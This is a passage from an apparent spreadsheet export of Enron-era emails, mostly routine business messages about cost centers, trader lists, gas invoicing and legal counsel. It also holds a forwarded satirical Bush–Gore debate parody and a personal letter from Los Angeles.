&gt; speaker's time has expired, I will whimper softly while he_x000D_
&gt; continues to spew incomprehensible statistics for three_x000D_
&gt; more minutes._x000D_
&gt;_x000D_
&gt; Let's start with the vice president. Mr. Gore, can you_x000D_
&gt; give us the name of a downtrodden citizen and then tell us_x000D_
&gt; his or her story in a way that strains the bounds of common_x000D_
&gt; sense?_x000D_
&gt;_x000D_
&gt; Gore: As I was saying to Tipper last night after we tenderly made_x000D_
&gt; love the way we have so often during the 30 years of our rock-solid_x000D_
&gt; marriage, the downtrodden have a clear choice in this election._x000D_
&gt;_x000D_
&gt; My opponent wants to cut taxes for the richest 1 percent of_x000D_
&gt; Americans. I, on the other hand, want to put the richest 1 percent in_x000D_
&gt; an ironclad lockbox so they can't hurt old people like Roberta_x000D_
&gt; Frampinhamper, who is here tonight._x000D_
&gt;_x000D_
&gt; Mrs. Frampinhamper has been selling her internal organs, one by one,_x000D_
&gt; to pay for gas so that she can travel to these debates and personify_x000D_
&gt; problems for me. Also, her poodle has arthritis._x000D_
&gt;_x000D_
&gt; Lehrer: Gov. Bush, your rebuttal._x000D_
&gt;_x000D_
&gt; Bush: Governors are on the front lines every day, hugging people,_x000D_
&gt; crying with them, relieving suffering anywhere a photo opportunity_x000D_
&gt; exists._x000D_
&gt;_x000D_
&gt; I want to empower those crying people to make their own_x000D_
&gt; decisions, unlike my opponent, whose mother is not Barbara Bush._x000D_
&gt;_x000D_
&gt; Lehrer: Let's turn to foreign affairs. Gov. Bush, if Slobodan_x000D_
&gt; Milosevic were to launch a bid to return to power in Yugoslavia,_x000D_
&gt; would you be able to pronounce his name?_x000D_
&gt;_x000D_
&gt; Bush: The current administration had eight years to deal with that_x000D_
&gt; guy and didn't get it done. If I'm elected, the first thing I would_x000D_
&gt; do about that guy is have Dick Cheney confer with our allies. And_x000D_
&gt; then Dick would present me several options for dealing with that guy._x000D_
&gt; And then Dick would tell me which one to choose. You know, as_x000D_
&gt; governor of Texas, I have to make tough foreign policy decisions_x000D_
&gt; every day about how we're going to deal with New Mexico._x000D_
&gt;_x000D_
&gt; Lehrer: Mr. Gore, your rebuttal._x000D_
&gt;_x000D_
&gt; Gore: Foreign policy is something I've always been keenly_x000D_
&gt; interested in. I served my country in Vietnam. I had an uncle who_x000D_
&gt; was a victim of poison gas in World War I. I myself lost a leg in the_x000D_
&gt; Franco-Prussian War. And when that war was over, I came_x000D_
&gt; home and tenderly made love to Tipper in a way that any undecided_x000D_
&gt; woman voter would find romantic._x000D_
&gt; If I'm entrusted with the office of president, I pledge to deal_x000D_
&gt; knowledgeably with any threat, foreign or domestic, by putting it in_x000D_
&gt; an ironclad lockbox. Because the American people deserve a president_x000D_
&gt; who can comfort them with simple metaphors._x000D_
&gt;_x000D_
&gt; Lehrer: Vice President Gore, how would you reform the Social Security_x000D_
&gt; system?_x000D_
&gt;_x000D_
&gt; Gore: It's a vital issue, Jim. That's why Joe Lieberman and I have_x000D_
&gt; proposed changing the laws of mathematics to allow us to give $50,000_x000D_
&gt; to every senior citizen without having it cost the federal treasury a_x000D_
&gt; single penny until the year 2250._x000D_
&gt; In addition, my budget commits $60 trillion over the next 10 years to_x000D_
&gt; guarantee that all senior citizens can have drugs delivered free to_x000D_
&gt; their homes every Monday by a federal employee who will also help_x000D_
&gt; them with the child-proof cap._x000D_
&gt;_x000D_
&gt; Lehrer: Gov. Bush?_x000D_
&gt;_x000D_
&gt; Bush: That's fuzzy math. I know, because as governor of Texas, I have_x000D_
&gt; to do math every day. I have to add up the numbers and decide whether_x000D_
&gt; I'm going to fill potholes out on Rt. 36 east of Abilene or commit_x000D_
&gt; funds to reroof the sheep barn at the Texas state fairgrounds._x000D_
&gt;_x000D_
&gt; Lehrer: It's time for closing statements._x000D_
&gt;_x000D_
&gt; Gore: I'm my own man. I may not be the most exciting politician, but_x000D_
&gt; I will fight for the working families of America, in addition to_x000D_
&gt; turning the White House into a lusty pit of marital love for Tipper_x000D_
&gt; and me._x000D_
&gt;_x000D_
&gt; Bush: It's time to put aside the partisanship of the past by electing_x000D_
&gt; no one but Republicans._x000D_
&gt; Lehrer: Good night._x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jun 2002 00:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'matthew.meyers@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cost Center?</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew,_x000D_
_x000D_
Our new cost center is cc 269.  This was effective at the beginning of the _x000D_
year._x000D_
_x000D_
Regards,_x000D_
Hollis_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Matthew Meyers_x000D_
06/07/2002 04:58 PM_x000D_
To: Hollis Kimbrough/EWC/Enron@ENRON_x000D_
cc: Jerry Holt/EWC/Enron@ENRON, Mark V Walker/EWC/Enron@ENRON, Mark _x000D_
Fisher/EWC/Enron@Enron, Jeff Duff/EWC/Enron@ENRON, John M _x000D_
Ruiz/EWC/Enron@Enron, Julie Johnson/EWC/Enron@Enron _x000D_
_x000D_
Subject: Cost Center?_x000D_
_x000D_
_x000D_
_x000D_
Greetings,_x000D_
_x000D_
To my best memory, the Systems Performance Group is cost center 267.  I _x000D_
picked up my American Funds retirement packet tonight from the front desk, _x000D_
and the sticker on the front states cost center 269.  Have we changed cost _x000D_
centers or is this a typo?_x000D_
_x000D_
Matt Meyers_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'araceli.romero@enron.com'})</t>
  </si>
  <si>
    <t>ENA traders</t>
  </si>
  <si>
    <t>Marie - Veronica is on vacation this week, but we can still provide you wit=_x000D_
h=20_x000D_
the current list.  AC, please call her and get her our most current list._x000D_
_x000D_
FYI, Donna Lowry=01,s just recently out on maternity leave, but is still=20_x000D_
dedicated enough to be working out a transition of the maintenance of the=_x000D_
=20_x000D_
authorized trader list to her group while she=01,s out.  It=01,s just tough=_x000D_
 this=20_x000D_
week due to her unexpected early delivery and Veronica=01,s vacation. Pleas=_x000D_
e=20_x000D_
bear with us._x000D_
_x000D_
Regards,_x000D_
Cassandra Schultz_x000D_
VP-Market Risk Management._x000D_
x30429._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Heard, Marie =20_x000D_
Sent: Thursday, June 07, 2001 9:10 AM_x000D_
To: Valdez, Veronica_x000D_
Cc: Schultz, Cassandra; Shackleton, Sara_x000D_
Subject: Authorized Trader List for ENA_x000D_
_x000D_
Veronica:_x000D_
_x000D_
Have you had a chance to update the authorized trader list for ENA?  It is=_x000D_
=20_x000D_
getting critical that we update it as we are getting requests from some of=_x000D_
=20_x000D_
the brokerage firms for an updated list.=20_x000D_
_x000D_
Please either send me the changes to the list I sent you last week or just=_x000D_
=20_x000D_
let me know the status._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
_x000D_
Marie Heard_x000D_
Senior Legal Specialist_x000D_
Enron North America Corp._x000D_
Phone:  (713) 853-3907_x000D_
Fax:  (713) 646-3490_x000D_
Marie.Heard@Enron.com</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 08:25:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: El Paso Pipeline Capacity Marketing</t>
  </si>
  <si>
    <t>Mara, pls ensure that everyone takes the time TODAY to fill this out with all the customers that we can market this to, including names and action plan._x000D_
_x000D_
I will need to review with Phillip and John later today._x000D_
BT _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bronstein, Mara  _x000D_
Sent:	Tuesday, September 25, 2001 10:23 AM_x000D_
To:	Ward, Kim S (Houston); Harrison, Tyrell; Whitt, Mark; Lucci, Paul T.; Fuller, Dave; Tycholiz, Barry_x000D_
Subject:	El Paso Pipeline Capacity Marketing_x000D_
_x000D_
I put the El Paso capacity marketing sheet for everyone to fill in on the o drive.  go to o://gas_trad/shortcut to west gas orig/bronstein/el paso pipeline capacity marketing.</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 01:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joe.gordon@enron.com', 'linda.robertson@enron.com', 'george.wood@enron.com', 'mark.bernstein@enron.com', 'gautam.gupta@enron.com', 'edward.baughman@enron.com', 'donna.fulton@enron.com', 'tom.hoatson@enron.com', 'sarah.novosel@enron.com', 'pearce.hammond@enron.com', 'garrett.tripp@enron.com', 'jeff.ader@enron.com', 'john.llodra@enron.com', 'steve.montovano@enron.com', 'janelle.scheuer@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'aleck.dadson@enron.com', 'berney.aucoin@enron.com', 'narsimha.misra@enron.com', 'jason.thompkins@enron.com', 'steven.kean@enron.com', 'kathleen.sullivan@enron.com', 'tom.may@enron.com', 'mbrown9@enron.com', 'howard.fromer@enron.com', 'paul.broderick@enron.com', 'mark.davis@enron.com', 'daniel.allegretti@enron.com', 'jim.meyn@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'joe.hartsoe@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>New York Regulatory Summary</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a memo from Howard Fromer, Kathleen Sullivan and me regarding _x000D_
regulatory issues in New York.  Also attached are presentations Enron has _x000D_
made recently._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Sarah_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Jul 2001 12:09:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>Interviews</t>
  </si>
  <si>
    <t xml:space="preserve">John please see if the following staff are interested in joining one of our, MW, SE, Ercot or NE hourly groups. Please note that there will be shift work involved.  To speed things up you can have them drop by to see me before they interview.._x000D_
_x000D_
EBS_x000D_
Sanjay Konur - Assoc_x000D_
Hector Alviar -Analyst_x000D_
Jeremy Buss -Assoc_x000D_
David Maskell - Assoc_x000D_
Sarah Goodpastor - Assoc_x000D_
Danielle Saadia - Assoc_x000D_
Justyn Thompson - Analyst_x000D_
Chalres Seely - Daniel Ferrell_x000D_
_x000D_
When they are ready please arrange for interviews by the following staff: Interviewers are Mark Dana Davis, Paul Thomas, John Forney, Don Baughman and Juan Hernandez.  Before an offer is given to the above staff Kevin Presto would like to do a final interview._x000D_
_x000D_
Please also arrange for a interview of Sanjay Gupta from Networks. Interviewers are Mark Dana Davis, John Forney, Don Baughman, Juan Hernandez and Kevin Presto._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 06:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott@scottpaul.com'})</t>
  </si>
  <si>
    <t>Re: Your ScottPaul.com order confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, my preferance would be to ship to Texas.  Please let me know.  Did you _x000D_
receive the check?  Sara_x000D_
_x000D_
_x000D_
_x000D_
	Scott Wright &lt;scott@scottpaul.com&gt;_x000D_
	10/29/2000 07:06 PM_x000D_
		 _x000D_
		 To: sara.shackleton@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re: Your ScottPaul.com order confirmation_x000D_
_x000D_
_x000D_
Dear Sara -_x000D_
_x000D_
I think we've found a way to ship to you in TX - would you rather do that? If _x000D_
so, just send me back your TX shipping address -_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Scott_x000D_
_x000D_
sara.shackleton@enron.com wrote:_x000D_
_x000D_
&gt; Thank you for your order with Scott Paul Wines!_x000D_
&gt;_x000D_
&gt; Please keep this email for your records._x000D_
&gt;_x000D_
&gt; PRODUCT NAME, PRICE, QTY, SUBTOTAL_x000D_
&gt; ---------------------------------------------------------------------_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; 1999 Pisoni Vineyard Pinot Noir,  $38.00,  12,  $456.00_x000D_
&gt;_x000D_
&gt;   Sub-Total:  $456.00_x000D_
&gt;                Tax:  $22.80_x000D_
&gt;      Shipping:  $53.92_x000D_
&gt; Grand Total:  $532.72_x000D_
&gt;_x000D_
&gt; Your shipping information is as follows:_x000D_
&gt;_x000D_
&gt;         Email:  sara.shackleton@enron.com_x000D_
&gt;         Name:  Michael McKeogh_x000D_
&gt; Address 1:  601 Poydras Street_x000D_
&gt; Address 2:  Suite 2421_x000D_
&gt;            City:  New Orleans_x000D_
&gt;          State:  Louisiana_x000D_
&gt;              Zip:  70130_x000D_
&gt;_x000D_
&gt; Our wines are on a first-come, first-served basis, so kindly mail your _x000D_
check promptly.  We may be unable to fulfill your order if payment is not _x000D_
received by November 10th.  Also include with your check a copy of this _x000D_
email, or the printout when you ordered your wine online._x000D_
&gt;_x000D_
&gt; The 1999 Chardonnay is scheduled to ship the week of November 13th, 2000._x000D_
&gt;_x000D_
&gt; The 1999 Pinot Noir - Pisoni Vineyard is scheduled to ship in late March, _x000D_
2001._x000D_
&gt;_x000D_
&gt; Please note that shipping dates may be subject to change, should we _x000D_
encounter extreme weather conditions that may adversely affect the wines._x000D_
&gt;_x000D_
&gt; If you have any questions, please contact us via email _x000D_
(martha@scottpaul.com) or call us direct at 707-944-1188._x000D_
&gt;_x000D_
&gt; Thank you again._x000D_
&gt;_x000D_
&gt; Martha and Scott Wright_x000D_
&gt; Proprietors_x000D_
&gt; Scott Paul Wines, LLC_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 10:13:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Reward in Anthrax Investigation Doubled to $2.5 Million_x000D_
_x000D_
http://www.abcnews.go.com_x000D_
_x000D_
_x000D_
ABCNEWS.com:  Up to the Moment, Up to You (tm)_x000D_
http://abcnews.go.com_x000D_
---_x000D_
You received this mail because you subscribed via ABCNEWS.com. If you would like to stop receiving these mailings, log into our mailcenter at http://login.mailpref.go.com/unsubscribe ._x000D_
_x000D_
Please do not respond to this mail. Questions or comments can be submitted at_x000D_
http://abcnews.go.com/service/help/abccontact.html</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 17:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'herrmannal@hotmail.com'})</t>
  </si>
  <si>
    <t>LA LA AL</t>
  </si>
  <si>
    <t>Well, yep, I am still alive, I still exist here in LA. This hasn't been_x000D_
easy, it's not easy, but it hasn't killed me, just given me a recurring_x000D_
chest cold. It seems that it's only really hard to breathe on the days when_x000D_
I have something pretty big and pressing to do, like the day before actually_x000D_
getting the truck, or today when I had to go to Aquent to get tested on my_x000D_
computer skills, and then wanted to go apply for jobs at 12 different_x000D_
photo-related businesses (which I didn't do). But on the days that I allow_x000D_
myself to have fun, it is great._x000D_
_x000D_
Last week on Monday I went to Point Dume beach w/ Mark Allen and his friend_x000D_
Elyse, and we had a great time. Of course the water and the day were way too_x000D_
cold to go swimming, but we hiked up a cliff overhanging the water, where_x000D_
surfers were trying to catch the 9-15 foot waves. I got pictures of them,_x000D_
and photo'd Mark and Elyse walking through the crazy daisies that grow_x000D_
bushlike out of the top of 2.5' sticks in the sand. Then on Sat., I went_x000D_
hiking by myself in Griffith Park, which is literally up the street from our_x000D_
house. Griffith Park is a big park in the Hollywood Hills, maybe (I'm not_x000D_
sure) where the Hollywood sign is. Sort of a California version of Central_x000D_
Park, with mountains and a whole lot more wild. (From our apartment, we can_x000D_
see the "lly" and "d" of the Hollywood sign, mostly obscured by palm trees.)_x000D_
So I was walking along this dirt fire road, amazed at the solitude and_x000D_
immensity of the nature, my head being buzzed by an annoyed bee or_x000D_
something, when I turned a corner and saw a huge chunk of LA in front of me._x000D_
I'm still too new here to be able to know exactly what I was looking at, but_x000D_
way in the distance I could see jets taking off from LAX, I think. Closer_x000D_
was Hollywood, where I live. There were some tall buildings that I think_x000D_
were the Melrose area, and way in the distance, I could see these buildings_x000D_
that were backlit from the light reflecting off the ocean. The Ocean. The_x000D_
Pacific. I could see the PACIFIC from the MOUNTAINS by my house. It is_x000D_
amazing. Okay, maybe they're technically hills, since I could walk up them_x000D_
following the trails, but they are definitely mountains to me. Besides, you_x000D_
can practically walk up Everest, w/ oxygen._x000D_
We've gone to art openings, had fun there, gone to parties, had fun there,_x000D_
too. Can't find really good, really cheap beer here like Pearl, yet, but_x000D_
I'll keep trying. The Food for Less has a twenty-pack of Budweiser for_x000D_
$9.98, just 50? a beer. Went to two music shows this last week, at two_x000D_
different places, and was able to bring my camera in, no problem._x000D_
I still haven't processed any film here yet, still way too broke to do it._x000D_
I've got about 18 or 19 rolls shot so far, some of it from before I left_x000D_
Houston. I'll probably process the film even though I "can't afford it", cuz_x000D_
I'm thinking I might be able to use some of the photos in my portfolio,_x000D_
which I can use to make me some big money. Gotta spend money to make it,_x000D_
gotta believe it's worth it, cuz it is. It's easy to believe in my head,_x000D_
but's harder to get off the couch. I'm still trying to get the guts to go_x000D_
through all my photos and put together my portfolio. I was out today, had_x000D_
just filled out a simple application at a camera store (my first), when I_x000D_
realized I was carrying around my graphics portfolio, and none of my photos._x000D_
So I bought some ice cream and came home._x000D_
I miss you guys. Tell me how you are. Write to me, email me, call me._x000D_
Instant message me, even. Jody is not enough for me, I need other friends._x000D_
Remember that I'm two hours behind you, and I stay up really late, so you_x000D_
can call me at 4am there and I'm still not even home from the bar yet. I_x000D_
expect every single one of you to move out here one day. Don't forget about_x000D_
me when I make it big._x000D_
_x000D_
Here's my contact info:_x000D_
Al Herrmann_x000D_
1811 Tamarind Ave., #315_x000D_
Hollywood, CA 90028_x000D_
(323) 461-0326_x000D_
_x000D_
xoxoxox,_x000D_
Al Herrmann_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 08:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Australia &amp; Japan</t>
  </si>
  <si>
    <t>The only online trading counterparty lists I am aware you see are the lists _x000D_
that originate from Houston Credit.  London has their own lists of _x000D_
counterparties I never see.  Do you think we need to get them to forward all _x000D_
lists with Japanese &amp; Australian counterparties to you and Jane for approval?</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Weekly GE Conference Call</t>
  </si>
  <si>
    <t xml:space="preserve">Imagine that._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
michael.barnas@ps.ge.com on 01/31/2001 01:16:49 PM_x000D_
To: kay.mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Weekly GE Conference Call_x000D_
_x000D_
I think we scared him._x000D_
_x000D_
-----Original Message-----_x000D_
From: Scott.Dieball@enron.com [mailto:Scott.Dieball@enron.com] _x000D_
Sent: Wednesday, January 31, 2001 12:53 PM_x000D_
To: Suzanne.Adams@enron.com_x000D_
Cc: Ben.Jacoby@enron.com; john.schroeder@ps.ge.com; kay.mann@enron.com;_x000D_
Kent.shoemaker@ae.ge.com; Lisa.Bills@enron.com;_x000D_
Michael.barnas@ps.ge.com; Roseann.Engeldorf@enron.com;_x000D_
Sheila.Tweed@enron.com; Stephen.swift@ps.ge.com_x000D_
Subject: Re: Weekly GE Conference Call_x000D_
_x000D_
_x000D_
_x000D_
I spoke to Sheila and Steve a few minutes ago and we all agreed to_x000D_
reschedule the meeting for next week.  Steve is to check with his guys as_x000D_
to what day/time will work for GE next week and I will do the same with the_x000D_
Enron folks.  Steve and I hope to coordinate and firm up the schedule this_x000D_
Friday at which time we will notify each of you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
                    Suzanne_x000D_
_x000D_
                    Adams@ECT            To:     Sheila Tweed/HOU/ECT@ECT,_x000D_
Ben Jacoby/HOU/ECT@ECT, Lisa       _x000D_
                                         Bills/Enron@EnronXGate, Roseann_x000D_
Engeldorf/Corp/Enron@ENRON, Scott    _x000D_
                    01/31/2001_x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt,                         _x000D_
                    10:22 AM             Stephen.swift@ps.ge.com,_x000D_
Michael.barnas@ps.ge.com,                   _x000D_
                                         Kent.shoemaker@ae.ge.com,_x000D_
kay.mann@enron.com,                        _x000D_
                                         john.schroeder@ps.ge.com_x000D_
_x000D_
                                         cc:_x000D_
_x000D_
                                         Subject:     Weekly GE Conference_x000D_
Call                               _x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The weekly GE conference call will go forward today at 1:30 p.m. CT.  For_x000D_
those of you in Houston, EB38C1 has been reserved._x000D_
_x000D_
DIAL IN, 1-888-285-4585, PART CODE 536220_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'randy.pais@enron.com'})</t>
  </si>
  <si>
    <t>Re: TECASO Project - Outside Counsel</t>
  </si>
  <si>
    <t xml:space="preserve">Randy, your suggestion looks fine to me.  Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Randy Pais_x000D_
12/12/2000 01:58 PM_x000D_
To: James Derrick/Corp/Enron@ENRON_x000D_
cc: Vicki Sharp/HOU/EES@EES, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: TECASO Project - Outside Counsel_x000D_
_x000D_
Jim,_x000D_
_x000D_
We are currently reviewing a new business opportunity with EES to enable _x000D_
EECC  to provide technical and commercial due diligence services for global _x000D_
infrastructure project financing.  If the new business opportunity receives _x000D_
approval from EES management, we see the need to retain outside counsel _x000D_
experienced in internet/web based issues.  Presently this need would be with _x000D_
the web, structuring, IP, and antitrust areas._x000D_
_x000D_
In an effort  to find a firm that Enron has used recently for web related _x000D_
matters, I spoke with Mark Taylor and Marianne Castano.  For Enron Online _x000D_
development, Mark used Sullivan and Cromwell and Milbank, Tweed for the _x000D_
web/trading effort and V &amp; E for IP matters,  For a recent EES internet _x000D_
project Marianne used Vivian Polak of LeBeouf Lamb for web/transactional _x000D_
issues and V &amp; E for IP matters.  She was very pleased with Vivian's _x000D_
support.  After discussing our specific requirements with Mark and Marianne _x000D_
and reviewing this matter with Vicki Sharp,  I spoke with Vivian briefly to _x000D_
confirm if she had the experience we needed.  I found she had exactly what we _x000D_
needed and subsequently discussed this with John Schwartzenburg.  John _x000D_
agreed. _x000D_
_x000D_
With your approval I would like permission to engage Vivian Polak of LeBeouf, _x000D_
Lamb for web, structuring and transactional related issues and Scott Brown of _x000D_
V &amp; E for IP matters.  _x000D_
_x000D_
If you should need any additional information concerning the TECASO Project _x000D_
or this request, please let me know._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Randy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 06:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ron.beidelman@enron.com', 'kyle.purvis@enron.com', 'ruth.jensen@enron.com', 'larry.campbell@enron.com', 'scott.jones@enron.com', 'leo.nichols@enron.com', 'dan.holli@enron.com', 'rick.loveless@enron.com', 'mike.riedel@enron.com', 'jacob.krautsch@enron.com', 'allan.schoen@enron.com'})</t>
  </si>
  <si>
    <t>oil &amp; gas, transmission &amp; storage MACT regulations</t>
  </si>
  <si>
    <t>FYI. I have updated the environmental notices regarding the oil &amp; gas, _x000D_
transmission &amp; storage MACT regulations on the EH&amp;S web site to reflect the _x000D_
recent technical changes to these regulations. The updates are located at:_x000D_
_x000D_
http://ehs.corp.enron.com/Documents/EnvResources/EnvironmentalNotices.htm_x000D_
_x000D_
Marc N. Phillips_x000D_
Manager, Regulatory Technical Analysis_x000D_
713-646-7646 (cell 713-594-6919)_x000D_
marc.phillips@enron.com</t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 04:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>mpakulsk@swbell.net</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 05:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Heartland Invoice for March</t>
  </si>
  <si>
    <t xml:space="preserve">I would recommend that once the trueup information is available and verified, _x000D_
a credit statement be prepared and forwarded to Heartland, such statement to _x000D_
provide that the credit statement is to be used in determining the next _x000D_
month's (April) prepayment.  I would not wire them the true-up amount so long _x000D_
as we have any reason to believe that they will continue to be in some level _x000D_
of operation requiring some level of gas purchases.  John, any comments._x000D_
_x000D_
_x000D_
_x000D_
	Charles Jacobs@ENRON_x000D_
	02/21/2001 01:03 PM_x000D_
		 _x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT, John Enerson/HOU/ECT@ECT, Patrice L _x000D_
Mims/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Heartland Invoice for March_x000D_
_x000D_
So what should the invoice look like for the March prepayment?  Should I just _x000D_
bill them the 1,500/day at the NX3+.34 next Monday; let them pre-pay that and _x000D_
then wire them whatever money is owed back to them after the trueup (probably _x000D_
sometime mid-April after the pipeline statements have been received and the _x000D_
volumes have been acutalized)?  Or does somebody want to estimate what the _x000D_
buyback volume and price would be so I can deduct that up front?_x000D_
---------------------- Forwarded by Charles Jacobs/NA/Enron on 02/21/2001 _x000D_
12:38 PM ---------------------------_x000D_
_x000D_
_x000D_
Dan J Hyvl@ECT_x000D_
02/21/2001 12:00 PM_x000D_
To: John Enerson/HOU/ECT@ECT_x000D_
cc: Charles Jacobs/NA/Enron@ENRON, Patrice L Mims/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Heartland Invoice for March  _x000D_
_x000D_
Chuck, The price obtained as the average of the closing price for the last _x000D_
three trading days for the month plus $0.34 is to be the price for the next _x000D_
month.  We need to give them a credit for the volumes that we purchase back _x000D_
due to their volume defaults in the month.  Our buyback price  is to be Gas _x000D_
Daily midpoint less $0.15 for the shortfall in volumes.  The $0.15 is the _x000D_
penalty for the default and the Gas Daily Midpoint price is what we purchase _x000D_
the shortfall back for; but remember if the Gas Daily Midpoint is higher that _x000D_
the Nx3, we use the Nx3 as the buyback price for the shortfall.  I know that _x000D_
you will not have  all of the information at the time you send them the _x000D_
invoice for the next month's prepayment, so you need to keep a schedule and _x000D_
trueup each month for the prior months activity.  _x000D_
_x000D_
John and Patrice, Do you agree with the foregoing?_x000D_
_x000D_
_x000D_
_x000D_
	John Enerson_x000D_
	02/21/2001 11:33 AM_x000D_
		_x000D_
		 To: Charles Jacobs/NA/Enron@ENRON_x000D_
		 cc: Dan J Hyvl/HOU/ECT@ECT, Patrice L Mims/HOU/ECT@ECT_x000D_
		 Subject: Re: Heartland Invoice for March_x000D_
_x000D_
Dan - please confirm for Dan that the pricing will be different after the _x000D_
last three trading days of the month for the NYMEX contract.  Dan - can you _x000D_
make sure you check with Patrice for this exact number so Chuck can send the _x000D_
invoice.  Thanks._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Charles Jacobs @ ENRON                           02/21/2001 10:59 AM_x000D_
	_x000D_
_x000D_
To: John Enerson/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Heartland Invoice for March_x000D_
_x000D_
John,_x000D_
_x000D_
When do you want me to send an invoice to Heartland so they can pre-pay for _x000D_
March gas?  I can bill the 1,500/day but I'll need the pricing.  Are we still _x000D_
going to use the NX3+.34 for March or do you want to use something else?  The _x000D_
NX3 will not be available for March until Monday so that would be the _x000D_
earliest I could send it using that price._x000D_
_x000D_
Let me know..._x000D_
Chuck_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 09:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jfine@kilstock.com'})</t>
  </si>
  <si>
    <t>Re: Richmond Project</t>
  </si>
  <si>
    <t xml:space="preserve">Jonathan,_x000D_
_x000D_
Please resend the draft confidentiality agreement for the Public Staff, _x000D_
preferably by email.  I cannot locate the document here._x000D_
_x000D_
The LOI with Rocky Mount is still under discussion.  In a recent discussion _x000D_
with one of Enron's folks the City (or their lawyer) raised the issue that _x000D_
Kilpatrick Stockton had represented them in the past, and that there might be _x000D_
a potential conflict.  I don't anticipate a problem, but we should discuss it _x000D_
soon._x000D_
_x000D_
Thank you for your assistance,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Fine, Jonathan" &lt;JFine@kilstock.com&gt; on 07/18/2000 08:09:28 AM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "Duncan, Allyson" &lt;aduncan@kilstock.com&gt;, "'lisa.mellencamp@enron.com'" _x000D_
&lt;lisa.mellencamp@enron.com&gt;, "'jeffrey.m.keenan@enron.com'" _x000D_
&lt;jeffrey.m.keenan@enron.com&gt; _x000D_
_x000D_
Subject: Richmond Project_x000D_
_x000D_
Kay:_x000D_
_x000D_
   Just a brief note to check on the status of the confidentiality_x000D_
agreement with the Public Staff.  What did you think of the draft Allyson_x000D_
and I forwarded by fax last week?  Once that is signed, we can go ahead and_x000D_
submit Jeffrey Keenan's cost estimates._x000D_
_x000D_
   Also, curious as to the status of the LOI and confidentiality_x000D_
agreement (draft attached to our last e-mail message) with the City of Rocky_x000D_
Mount._x000D_
_x000D_
   Once these documents are finalized, Allyson and I can continue to_x000D_
move your project forward.  In the meantime, as you know, Allyson has been_x000D_
